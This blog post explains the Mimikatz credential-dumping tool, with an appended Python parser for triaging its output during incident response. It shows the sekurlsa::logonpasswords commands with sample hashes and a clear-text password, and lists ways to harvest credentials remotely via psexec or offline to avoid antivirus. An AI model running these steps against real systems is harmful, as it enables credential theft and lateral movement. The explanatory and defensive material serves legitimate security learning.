Mimikatz: A nasty little piece of awesomeness

Today I’m going to tell you about a surprisingly powerful and easy-to-use nasty little tool called Mimikatz.

In a nutshell, it grabs passwords in clear text (!) from memory by injecting a DLL into lsass.exe – the process that manages local security on the system. Without getting into the technicalities, this tool lets anyone grab the plain text passwords of everyone who has recently logged onto the system (and whose password is still in memory).

Traditionally, authentication with NTLM or Kerberos happens by passing the hashed password to the authentication server. As we know, hashing is a one-way function, meaning the original password cannot be recovered from the hash alone (yes, I know that’s not entirely true and there are ways to recover it, but certain conditions make it computationally infeasible, so bear with me). Since only the hash is being passed around, the original password remains safe.

With mimikatz though, you can retrieve the original password from memory. The reason is that Digest Authentication requires the user’s plain text password – not just the hash – to be known to the authenticating side for certain authentication schemes (like SASL and HTTP Digest Auth), so the WDigest security package keeps that plain text password in memory.

Example from the author’s site:

mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...
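As an added illustration (not part of the original post, and not code from mimikatz itself), here is a small Python parser for the sekurlsa::logonpasswords layout shown above. It is the kind of thing an incident responder writes when that output turns up in a forensic image or attacker loot: it turns the dump into the list of accounts whose clear-text password was exposed and must be reset first, treating empty and "(null)" entries as not exposed. The first session in the embedded sample is the one from the post; the second is constructed.

```python
import re
# Constructed sample in the layout of `sekurlsa::logonpasswords` output: the session
# from the post plus a made-up service session whose wdigest entry holds no password.
SAMPLE = """\
Authentication Id : 0 ; 515764 (00000000:0007deb4)
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
        msv :
         * Domain   : vm-w7-ult-x
         * NTLM     : cc36cf7a8514893efccd332446158b1a
        tspkg :
         * Password : waza1234/
Authentication Id : 0 ; 996 (00000000:000003e4)
User Name         : svc-backup
Domain            : CORP
        msv :
         * NTLM     : 0123456789abcdef0123456789abcdef
        wdigest :
         * Password : (null)
"""
HEADER = re.compile(r"^Authentication Id\s*:")
PROVIDER = re.compile(r"^\s+(msv|tspkg|wdigest|kerberos|ssp|credman)\s*:\s*$")
FIELD = re.compile(r"^\s*\*?\s*(User Name|Domain|NTLM|Password)\s*:\s*(.*)$")

def parse_logonpasswords(text):
    """One dict per logon session: user, domain, NTLM hash, clear-text password."""
    sessions, provider = [], None
    for line in text.splitlines():
        if HEADER.match(line):  # a new logon session starts here
            sessions.append({"user": None, "domain": None, "ntlm": None, "plaintext": None})
            provider = None
        elif not sessions:
            continue
        elif m := PROVIDER.match(line):  # msv / tspkg / wdigest ... sub-block
            provider = m.group(1)
        elif m := FIELD.match(line):
            key, value, cur = m.group(1), m.group(2).strip(), sessions[-1]
            if key == "User Name":
                cur["user"] = value
            elif key == "Domain" and provider is None:  # session-level domain only
                cur["domain"] = value
            elif key == "NTLM":
                cur["ntlm"] = value
            elif key == "Password" and value not in ("", "(null)"):
                cur["plaintext"] = value  # clear-text credential was exposed
    return sessions

def exposed_accounts(text):
    """DOMAIN\\user for every session whose clear-text password was recovered."""
    return sorted({f"{s['domain']}\\{s['user']}" for s in parse_logonpasswords(text) if s["plaintext"]})
```

Accounts that only show an NTLM hash are still worth a reset, but the ones returned by exposed_accounts are the ones an attacker can use directly against anything that takes a password.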


Details:


Uses:

  • Can run locally to harvest the passwords of all logged-on users
  • Can run remotely using psexec to harvest a remote machine’s passwords
  • Can create a dump file from lsass.exe on the local machine and harvest the creds offline, to avoid getting tagged by AV

There are plenty of blog posts online detailing the various ways one can get creative with this tool, so I won’t give you more ideas here; there’s even a Metasploit module for it! Here are a few that I really liked:

http://blog.gentilkiwi.com/mimikatz (author’s site)

http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass

http://carnal0wnage.attackresearch.com/2013/07/mimikatz-minidump-and-mimikatz-via-bat.html
